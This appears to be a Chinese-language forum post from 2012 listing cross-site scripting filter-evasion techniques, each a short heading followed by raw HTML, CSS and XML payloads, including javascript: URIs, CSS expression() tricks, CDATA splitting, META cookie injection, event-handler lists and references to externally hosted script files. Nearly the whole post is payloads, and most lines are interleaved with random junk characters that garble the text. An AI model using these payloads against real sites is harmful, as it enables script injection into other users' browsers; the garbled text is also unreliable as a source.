1. 改变字符大小写
$ R+ ?' `- g l& d! \5 S8 o) N) H6 t3 Z0 e7 E$ v% j
4 Y* \- A1 u. L4 i" h, g: P# W
/ T6 G; {7 N9 d# l
<sCript>alert(‘d’)</scRipT>' A6 A3 p+ m% s. ^' |2 I# X" I
, }/ h% v# s1 Q+ Y# @, S# Z2. 利用多加一些其它字符来规避Regular Expression的检查! l7 R0 S( [' p' h. b7 M
/ n) V" e6 d. ]$ B* T
<<script>alert(‘c’)//<</script>
8 Z$ g; g9 v, M. z6 C9 W* [5 |2 ]8 G' {% k. A& E
<SCRIPT a=">" SRC="t.js"></SCRIPT>
/ k+ O" C" E+ ]$ R$ z' I
. o& E% ^% e$ v9 r: [/ j; V <SCRIPT =">" SRC="t.js"></SCRIPT>
4 x$ A+ w3 l! |! u
* O* N; o; P l# @& h0 |* I <SCRIPT a=">" ” SRC="t.js"></SCRIPT>5 W% G2 {1 a6 E/ L
9 V1 K) _% [( L( ^/ C( V: O <SCRIPT "a=’>’" SRC="t.js"></SCRIPT># |0 Y: f7 p: m0 P0 q& `: t
{' U. W0 j# @: b$ q' [
<SCRIPT a=`>` SRC="t.js"></SCRIPT>& [: a" ] Y1 u2 I
. f9 t D6 r- D <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
# [/ s- e8 p, n0 n0 {6 j: Q5 w
! T9 h) v; j$ }' [3 E* A4 A3. 以其它扩展名取代.js7 H* ^+ F8 P( N& s8 J" Y* X
8 C8 c5 X; s9 b' s
<script src="bad.jpg"></script>
. U3 G/ V$ x! Z& }2 q& B& K
; J9 x3 `6 E: \$ K4 f2 R4 l0 a" t4. 将Javascript写在CSS档里
6 E: ^! ^# E8 V5 `5 n l# ]# Y& s$ h& v+ {
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">, W. f' Q$ A2 S, p9 G6 ~7 @1 f
- }- D5 B3 @9 C1 v- z( S. s8 |
example:
5 b- \8 I. a2 U3 F+ V7 X f6 [
, l; d7 j( p% E3 r body {
* O* x. X( T! X7 O8 Y6 s# N1 v/ ~2 Q5 C8 b R, z V- [
background-image: url(‘javascript:alert("XSS");’)
" D, e3 n- f7 n7 k0 I
8 y% Z& f' s u3 j; m }# A2 n4 h6 F3 ?/ J6 W
6 b0 w/ G& q9 R( H, ~* X5. 在script的tag里加入一些其它字符3 ?* C5 U$ c/ |1 Y* G% e5 f" |0 M
5 }+ e. \' ~2 m0 D& y
<SCRIPT/SRC="t.js"></SCRIPT>
: Z3 f. O! M. M- N) X" I6 H1 ]" P3 E/ p# I- C: n; C/ M, |$ V ?
<SCRIPT/anyword SRC="t.js"></SCRIPT>& o y* P; I( g7 p* [3 W, w
& I2 C' v4 ~3 o/ q/ l
6. 使用tab或是new line来规避- [% e- l3 j3 h
4 Y# n2 D0 A# p# i6 w: I h
<img src="jav ascr ipt:alert(‘XSS3′)">" G' W1 g! W+ P5 Z
( x* o8 D9 k, \/ T4 M! d
<img src="jav ascr ipt:alert(‘XSS3′)">
( \9 K7 h7 }3 S- [, r) H- {8 U& x+ _$ u# |5 z* S6 {
<IMG SRC="jav ascript:alert(‘XSS’);">2 l( Y# e/ z7 k( k# [8 c9 v9 P
7 j! K" D# g0 u
-> tag( P( {+ y# i- X2 [0 p& r
) H7 @* a& B) A) x( ]( V! `3 A. W
-> new line2 |7 P% X p6 M% T# s& \
) U5 J: W; I7 l7 R
7. 使用"\"来规避
q0 L# q! a8 E G5 l: U, ~4 W" l$ H0 Z; C# \+ i
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
4 e2 z! N# Q" I* r: X3 K
. z% B# b) _+ q& ?2 O <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
! \) I+ O1 H- S$ @2 k" Z% L" O+ @' T" P" y/ s0 Y
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">3 }) a/ J( n( F% i2 }( J$ l" }
9 G5 J( y: D5 c3 N) T& z <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
2 `" M" k6 z* n5 X" x4 }: U. H
@* ?9 R2 O- C. D. S/ r( i <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>) K! K, P" L; [& \2 f5 A" Q
9 N; v7 H8 H) C5 k; i' B' A8. 使用Hex encode来规避(也可能会把";"拿掉)
% k3 V/ j% _: B* F1 g" A: B$ X! z+ Z* l- }7 s% O
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
% y% w0 S K0 l5 M0 ^: G
% D- X, L. p. c7 ?" }. c" S$ m 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
% i- v. r# u. U& b1 h. c$ m( W/ p6 Q1 [- l9 Z0 i
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
4 w( A9 Z" W+ e. t6 W6 y6 e6 d8 w7 D2 L" h! K2 s$ | `$ u. Z0 l
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);"># t2 C- v0 T' v+ m& A* w2 S- }1 q+ b
& _9 @0 \( t, t" B9. script in HTML tag
/ w; Q( h" L8 ^3 q
. M( e0 D6 P, t <body onload=」alert(‘onload’)」>
1 C& a, V+ f) I, t& t6 a0 G
7 o* Y0 u3 D6 j- }- N onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload- [- I; x: S% ?9 H4 P* y
* C$ y; s$ v+ d& f' y1 d# L$ g
10. 在swf里含有xss的code
+ S: l7 m$ x# i/ ^
( x& A, j# b; w/ q% E <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>; l; O, y% {" Y, W# c
9 b0 p* o& T |11. 利用CDATA将xss的code拆开,再组合起来。* U4 |9 M7 B& ^
- w6 ]6 o* Q( h5 |; {, H <XML ID=I><X><C>! Y6 ]5 s; @9 I; b! j
7 W0 b2 ^9 M: z) ~& Z. [
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>+ G/ J' ~% l4 C
" Z0 @. l. K0 z# u( [4 O
</C></X>0 K! f- ^; t; l0 ?, @, ], j
6 N7 B K/ h8 i3 u7 W6 f* z3 @
</xml>
& M. @+ i; o( }7 t2 r. p9 A i) } V. O* @
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
& \( E" a9 Z' z1 l
2 U( e& ]; u" ?- n <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
: p- U9 `+ D: }) n g
& \: K O! a% ] <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
1 o" B) W6 ~, B& v8 w' O! `. n9 n1 G1 K% x) v! Z4 M
12. 利用HTML+TIME。
$ U% A" c O: j% _: \# L& s" n0 `! ]2 _% ~0 Q! C) _
<HTML><BODY>
6 Z n6 [" m6 f/ a5 Q8 |! E$ Q* ]/ e! P: T
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">" T5 d2 s! [( `# A* g
% f9 N2 Z: g& X$ d" Z- U <?import namespace="t" implementation="#default#time2">3 C; C; ]5 S# _0 B6 D
3 Y6 _ [1 r {9 D# o$ ~- ^ <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
( l' S2 j; D( i/ M8 S, z3 J! V' T! A( p( \7 K
</BODY></HTML>- _6 S9 {2 V z! [
8 `0 E; ^5 X" B9 ~8 ]2 `
13. 透过META写入Cookie。2 ?% A T9 g9 `9 n+ J0 t
) B T3 H( J& Z7 l9 j, c <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">3 [# `* j2 l4 E; v
m+ ^" }% |1 q Y; x6 @/ h14. javascript in src , href , url
( Z w! a( _4 M% H8 c& L# D
# i0 \1 k1 ?- u3 ~& X7 @* i7 N <IFRAME SRC=javascript:alert(’13′)></IFRAME>
$ B% w' ^- ~1 |5 m, ]
4 v2 U- K2 a! E% C6 A <img src="javascript:alert(‘XSS3′)">, V' c1 r8 Q. m7 j6 Q
! f c7 t; o) X$ d: Y1 k
<IMG DYNSRC="javascript:alert(‘XSS20′)">
: w8 M) b; f7 O& a% V- v9 ?3 i/ f( _. U9 V0 d$ `* k! a- s
<IMG LOWSRC="javascript:alert(‘XSS21′)">
( @+ g+ p$ H: d! t/ c
6 h' g2 P# B3 h0 a* K$ _ <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
8 b8 V" i; j+ w" [, B
5 H1 S& n2 C, @/ T! F% k8 C <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME> S! }1 | t, D9 L; B$ `) b" V
$ F: B. r# @, {9 K
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
$ K D. a$ m, D) m# h$ \- v% g& ^
! j/ z' O0 M! U+ C( [2 G <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
5 @- N$ _( q; G& g {6 E" d+ b4 h. [' _: O6 \/ i# Z
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
# }6 i% M) f. B: f! n9 G) X' ?5 I- V1 h
</STYLE><A CLASS=XSS></A>
S3 |3 V1 [0 e# G8 l" b9 G; x
2 j: D/ `- P7 z/ [* } <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
" `' a6 |* [6 L! a
! E3 j* O" D- P) P5 L- {% b |
发表于 2012-12-31 09:59:28
收藏
支持
反对